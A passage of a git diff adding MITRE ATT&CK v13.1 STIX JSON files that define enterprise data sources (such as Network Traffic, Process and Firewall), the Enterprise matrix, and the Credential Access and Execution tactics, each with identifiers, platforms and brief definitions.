+ "Windows", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--ba27545a-9c32-47ea-ba6a-cce50f1b326e", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0033", + "external_id": "DS0033" + }, + { + "source_name": "Microsoft NFS Overview", + "description": "Microsoft. (2018, July 9). Network File System overview. Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/windows-server/storage/nfs/nfs-overview" + } + ], + "modified": "2022-03-30T14:26:51.806Z", + "name": "Network Share", + "description": "A storage resource (typically a folder or drive) made available from one host to others using network protocols, such as Server Message Block (SMB) or Network File System (NFS)(Citation: Microsoft NFS Overview)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--c000cd5c-bbb3-4606-af6f-6c6d9de0bbe3.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--c000cd5c-bbb3-4606-af6f-6c6d9de0bbe3.json new file mode 100644 index 0000000000000000000000000000000000000000..a6e28a4fa7031ee02fc35788909d0bf23d7e31f4 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--c000cd5c-bbb3-4606-af6f-6c6d9de0bbe3.json @@ -0,0 +1,52 @@ +{ + "type": "bundle", + "id": "bundle--30ef6d46-246d-421c-adf3-79c2d7ad439d", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-20T18:38:13.356Z", + "name": "Network Traffic", + "description": "Data transmitted across a network (ex: Web, DNS, Mail, File, etc.), that is either summarized (ex: Netflow) and/or captured as raw data in an analyzable format (ex: PCAP)", + "x_mitre_platforms": [ + "IaaS", + "Linux", + "Windows", + "macOS", + "Android", + "iOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)", + "ExtraHop" + ], + "x_mitre_collection_layers": [ + "Cloud Control Plane", + "Host", + "Network" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--c000cd5c-bbb3-4606-af6f-6c6d9de0bbe3", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0029", + "external_id": "DS0029" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--c3af32ff-65c5-4ea8-912a-fb4a85197239.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--c3af32ff-65c5-4ea8-912a-fb4a85197239.json new file mode 100644 index 0000000000000000000000000000000000000000..5c89dc49f5455444dd6230667f6512939d56e68f --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--c3af32ff-65c5-4ea8-912a-fb4a85197239.json @@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--2ad4866b-9ef7-41ca-a265-1cb764e791e6", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-12-07T19:51:37.141Z", + "name": "Cluster", + "description": "A set of containerized computing resources that are managed together but have separate nodes to execute various tasks and/or applications(Citation: Kube Cluster Admin)(Citation: Kube Cluster Info)", + "x_mitre_platforms": [ + "Containers" + ], + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Container" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--c3af32ff-65c5-4ea8-912a-fb4a85197239", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0031", + "external_id": "DS0031" + }, + { + "source_name": "Kube Cluster Admin", + "description": "kubernetes. (2021, January 16). Cluster Administration. Retrieved October 13, 2021.", + "url": "https://kubernetes.io/docs/concepts/cluster-administration/" + }, + { + "source_name": "Kube Cluster Info", + "description": "kubernetes. (n.d.). cluster-info. Retrieved October 13, 2021.", + "url": "https://kubernetes.io/docs/reference/generated/kubectl/kubectl-commands#cluster-info" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--c9ddfb51-eb45-4e22-b614-44ac1caa7883.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--c9ddfb51-eb45-4e22-b614-44ac1caa7883.json new file mode 100644 index 0000000000000000000000000000000000000000..62782e4e22c95d1cd3a9745e7443893cd017498d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--c9ddfb51-eb45-4e22-b614-44ac1caa7883.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--c34c41df-b226-40af-ba76-a4d50eb872bb", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Containers", + "Linux", + "Windows", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Container", + "Host" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--c9ddfb51-eb45-4e22-b614-44ac1caa7883", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0003", + "external_id": "DS0003" + }, + { + "source_name": "Microsoft Tasks", + "description": "Microsoft. (2018, May 31). Tasks. Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/win32/taskschd/tasks" + } + ], + "modified": "2022-03-30T14:26:51.806Z", + "name": "Scheduled Job", + "description": "Automated tasks that can be executed at a specific time or on a recurring schedule running in the background (ex: Cron daemon, task scheduler, BITS)(Citation: Microsoft Tasks)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--ca1cb239-ff6d-4f64-b9d7-41c8556a8b4f.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--ca1cb239-ff6d-4f64-b9d7-41c8556a8b4f.json new file mode 100644 index 0000000000000000000000000000000000000000..8b3265f07cc4e2051662dfe2e32aa020b8cc674d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--ca1cb239-ff6d-4f64-b9d7-41c8556a8b4f.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--1398b0fd-4376-4576-8904-9b82ba421935", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--ca1cb239-ff6d-4f64-b9d7-41c8556a8b4f", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.265Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0001", + "external_id": "DS0001" + } + ], + "modified": "2022-03-30T14:26:51.805Z", + "name": "Firmware", + "description": "Computer software that provides low-level control for the hardware and device(s) of a host, such as BIOS or UEFI/EFI", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--d6188aac-17db-4861-845f-57c369f9b4c8.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--d6188aac-17db-4861-845f-57c369f9b4c8.json new file mode 100644 index 0000000000000000000000000000000000000000..b7e9f5b9de8085992094a6b9eecf46914b3f50db --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--d6188aac-17db-4861-845f-57c369f9b4c8.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--634e101c-cdfa-4cb0-a02d-5b66043c5750", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Azure AD", + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Cloud Control Plane", + "Host" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--d6188aac-17db-4861-845f-57c369f9b4c8", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0026", + "external_id": "DS0026" + }, + { + "source_name": "Microsoft AD DS Getting Started", + "description": "Foulds, I. et al. (2018, August 7). AD DS Getting Started. Retrieved September 23, 2021.", + "url": "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/ad-ds-getting-started" + } + ], + "modified": "2022-03-30T14:26:51.803Z", + "name": "Active Directory", + "description": "A database and set of services that allows administrators to manage permissions, access to network resources, and stored data objects (user, group, application, or devices)(Citation: Microsoft AD DS Getting Started)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--d710099e-df94-4be4-bf85-cabd30e912bb.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--d710099e-df94-4be4-bf85-cabd30e912bb.json new file mode 100644 index 0000000000000000000000000000000000000000..0b423254a32cff3c8ce0a1a00be02ee64ea044ad --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--d710099e-df94-4be4-bf85-cabd30e912bb.json @@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--07acbceb-cbf8-48f6-b7cd-134fc688e47c", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--d710099e-df94-4be4-bf85-cabd30e912bb", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0019", + "external_id": "DS0019" + }, + { + "source_name": "Microsoft Services", + "description": "Microsoft. (2017, March 30). Introduction to Windows Service Applications. Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications" + }, + { + "source_name": "Linux Services Run Levels", + "description": "The Linux Foundation. (2006, January 11). An introduction to services, runlevels, and rc.d scripts. Retrieved September 28, 2021.", + "url": "https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/" + } + ], + "modified": "2022-03-30T14:26:51.807Z", + "name": "Service", + "description": "A computer process that is configured to execute continuously in the background and perform system tasks, in some cases before any user has logged in(Citation: Microsoft Services)(Citation: Linux Services Run Levels)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--dd75f457-8dc0-4a24-9ae5-4b61c33af866.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--dd75f457-8dc0-4a24-9ae5-4b61c33af866.json new file mode 100644 index 0000000000000000000000000000000000000000..afbd84420cc2808e7449c99065c5dfcc0b3e4051 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--dd75f457-8dc0-4a24-9ae5-4b61c33af866.json @@ -0,0 +1,38 @@ +{ + "type": "bundle", + "id": "bundle--32f6c249-1436-4330-8c90-251c9d45b9b8", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_collection_layers": [ + "OSINT" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--dd75f457-8dc0-4a24-9ae5-4b61c33af866", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.275Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0038", + "external_id": "DS0038" + } + ], + "modified": "2021-10-20T15:05:19.275Z", + "name": "Domain Name", + "description": "Information obtained (commonly through registration or activity logs) regarding one or more IP addresses registered with human readable names (ex: mitre.org)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22.json new file mode 100644 index 0000000000000000000000000000000000000000..65fc87c26e64dd77d2a2c84e6b4d975e212af1d4 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22.json @@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--614d9e4b-9d1c-4ffe-aaaa-85b28ae9a615", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-20T18:38:26.515Z", + "name": "Process", + "description": "Instances of computer programs that are being executed by at least one thread. Processes have memory space for process executables, loaded modules (DLLs or shared libraries), and allocated memory regions containing everything from user input to application-specific data structures(Citation: Microsoft Processes and Threads)", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS", + "Android", + "iOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0009", + "external_id": "DS0009" + }, + { + "source_name": "Microsoft Processes and Threads", + "description": "Microsoft. (2018, May 31). Processes and Threads. Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--f2f4f4bd-3455-400f-b2ee-104004df0f5b.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--f2f4f4bd-3455-400f-b2ee-104004df0f5b.json new file mode 100644 index 0000000000000000000000000000000000000000..3789c503ae22b55f62fd02e984d4236f1a8ce451 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--f2f4f4bd-3455-400f-b2ee-104004df0f5b.json @@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--6f40cca2-3df9-4ce3-8fab-ae7773d0ae0c", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Azure AD", + "Google Workspace", + "IaaS", + "Linux", + "Office 365", + "SaaS", + "Windows", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Cloud Control Plane", + "Host" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--f2f4f4bd-3455-400f-b2ee-104004df0f5b", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0018", + "external_id": "DS0018" + }, + { + "source_name": "AWS Sec Groups VPC", + "description": "Amazon. (n.d.). Security groups for your VPC. Retrieved October 13, 2021.", + "url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html" + } + ], + "modified": "2022-03-30T14:26:51.805Z", + "name": "Firewall", + "description": "A network security system, running locally on an endpoint or remotely as a service (ex: cloud environment), that monitors and controls incoming/outgoing network traffic based on predefined rules(Citation: AWS Sec Groups VPC)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--f424e4b4-a8a4-4c58-a4ae-4f53bfd08563.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--f424e4b4-a8a4-4c58-a4ae-4f53bfd08563.json new file mode 100644 index 0000000000000000000000000000000000000000..7e92e6bc810b9c6b7c61a71517695d1b0d63d155 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--f424e4b4-a8a4-4c58-a4ae-4f53bfd08563.json @@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--b92ec823-ac91-43d9-ab53-2bf928b7f744", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--f424e4b4-a8a4-4c58-a4ae-4f53bfd08563", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0011", + "external_id": "DS0011" + }, + { + "source_name": "Microsoft LoadLibrary", + "description": "Microsoft. (2018, December 5). LoadLibraryA function (libloaderapi.h). Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya" + }, + { + "source_name": "Microsoft Module Class", + "description": "Microsoft. (n.d.). Module Class. Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module" + } + ], + "modified": "2022-03-30T14:26:51.806Z", + "name": "Module", + "description": "Executable files consisting of one or more shared classes and interfaces, such as portable executable (PE) format binaries/dynamic link libraries (DLL), executable and linkable format (ELF) binaries/shared libraries, and Mach-O format binaries/shared libraries(Citation: Microsoft LoadLibrary)(Citation: Microsoft Module Class)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-matrix/x-mitre-matrix--eafc1b4c-5e56-4965-bd4e-66a6a89c88cc.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-matrix/x-mitre-matrix--eafc1b4c-5e56-4965-bd4e-66a6a89c88cc.json new file mode 100644 index 0000000000000000000000000000000000000000..20f9d1100aa6812af2a8528f16b661a3a1f7ed80 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-matrix/x-mitre-matrix--eafc1b4c-5e56-4965-bd4e-66a6a89c88cc.json @@ -0,0 +1,45 @@ +{ + "type": "bundle", + "id": "bundle--77873ccf-35c3-452f-9c10-1df65db11ac0", + "spec_version": "2.0", + "objects": [ + { + "tactic_refs": [ + "x-mitre-tactic--daa4cbb1-b4f4-4723-a824-7f1efd6e0592", + "x-mitre-tactic--d679bca2-e57d-4935-8650-8031c87a4400", + "x-mitre-tactic--ffd5bcee-6e16-4dd2-8eca-7b3beedf33ca", + "x-mitre-tactic--4ca45d45-df4d-4613-8980-bac22d278fa5", + "x-mitre-tactic--5bc1d813-693e-4823-9961-abf9af4b0e92", + "x-mitre-tactic--5e29b093-294e-49e9-a803-dab3d73b77dd", + "x-mitre-tactic--78b23412-0651-46d7-a540-170a1ce8bd5a", + "x-mitre-tactic--2558fd61-8c75-4730-94c4-11926db2a263", + "x-mitre-tactic--c17c5845-175e-4421-9713-829d0573dbc9", + "x-mitre-tactic--7141578b-e50b-4dcc-bfa4-08a8dd689e9e", + "x-mitre-tactic--d108ce10-2419-4cf9-a774-46161d6c6cfe", + "x-mitre-tactic--f72804c5-f15a-449e-a5da-2eecd181f813", + "x-mitre-tactic--9a4e74ab-5008-408c-84bf-a10dfbc53462", + "x-mitre-tactic--5569339b-94c2-49ee-afb3-2222936582c8" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-matrix--eafc1b4c-5e56-4965-bd4e-66a6a89c88cc", + "type": "x-mitre-matrix", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "enterprise-attack", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/matrices/enterprise" + } + ], + "modified": "2022-04-01T20:43:55.937Z", + "name": "Enterprise ATT&CK", + "description": "Below are the tactics and technique representing the MITRE ATT&CK Matrix for Enterprise. The Matrix contains information for the following platforms: Windows, macOS, Linux, AWS, GCP, Azure, Azure AD, Office 365, SaaS.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--2558fd61-8c75-4730-94c4-11926db2a263.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--2558fd61-8c75-4730-94c4-11926db2a263.json new file mode 100644 index 0000000000000000000000000000000000000000..6f2d9ceb5a4a9729482ce9844c7701be9a8f77bc --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--2558fd61-8c75-4730-94c4-11926db2a263.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--2a3b4375-0dca-41ec-8442-674b3d5cf63f", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--2558fd61-8c75-4730-94c4-11926db2a263", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0006", + "url": "https://attack.mitre.org/tactics/TA0006", + "source_name": "mitre-attack" + } + ], + "modified": "2019-07-19T17:43:41.967Z", + "name": "Credential Access", + "description": "The adversary is trying to steal account names and passwords.\n\nCredential Access consists of techniques for stealing credentials like account names and passwords. Techniques used to get credentials include keylogging or credential dumping. Using legitimate credentials can give adversaries access to systems, make them harder to detect, and provide the opportunity to create more accounts to help achieve their goals.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "credential-access" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--4ca45d45-df4d-4613-8980-bac22d278fa5.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--4ca45d45-df4d-4613-8980-bac22d278fa5.json new file mode 100644 index 0000000000000000000000000000000000000000..edc07b64e41bdada778d6539f1161aa571ec71e5 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--4ca45d45-df4d-4613-8980-bac22d278fa5.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--6183af15-0e62-4bb9-b5a9-7fb624719227", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--4ca45d45-df4d-4613-8980-bac22d278fa5", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0002", + "url": "https://attack.mitre.org/tactics/TA0002", + "source_name": "mitre-attack" + } + ], + "modified": "2019-07-19T17:42:06.909Z", + "name": "Execution", + "description": "The adversary is trying to run malicious code.\n\nExecution consists of techniques that result in adversary-controlled code running on a local or remote system. Techniques that run malicious code are often paired with techniques from all other tactics to achieve broader goals, like exploring a network or stealing data. For example, an adversary might use a remote access tool to run a PowerShell script that does Remote System Discovery. ", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "execution" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--5569339b-94c2-49ee-afb3-2222936582c8.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--5569339b-94c2-49ee-afb3-2222936582c8.json new file mode 100644 index 0000000000000000000000000000000000000000..c72cb6ca0f9a2e4a5b3570ed52d0b51cbaf11c4b --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--5569339b-94c2-49ee-afb3-2222936582c8.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--18738568-e89a-44f8-988a-59625e11013a", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + 